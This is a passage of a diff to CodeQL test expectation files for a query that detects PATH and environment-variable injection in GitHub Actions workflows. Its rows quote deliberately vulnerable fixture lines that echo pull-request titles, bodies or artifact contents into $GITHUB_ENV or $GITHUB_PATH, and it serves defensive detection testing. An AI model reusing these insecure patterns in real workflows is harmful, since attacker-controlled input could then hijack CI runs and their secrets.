injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | echo $PATHINJ >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | echo ${PATHINJ} >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | echo "$(cat foo/bar)" >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected index a79053f2240e..9914ae91df12 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected @@ -93,39 +93,39 @@ nodes | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | semmle.label | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | subpaths #select -| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | -| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | -| .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | -| .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | -| .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | -| .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | -| .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | -| .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | -| .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | -| .github/workflows/test7.yml:16:9:24:35 | Uses Step | .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test7.yml:16:9:24:35 | Uses Step | Uses Step | -| .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | -| .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | -| .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | -| .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | -| .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | cat foo/.github/java-config.env >> $GITHUB_ENV | -| .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test11.yml:15:9:21:6 | Uses Step | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | -| .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | -| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | -| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | -| .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | -| .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | -| .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | -| .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | -| .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | -| .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | -| .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | -| .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | +| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> 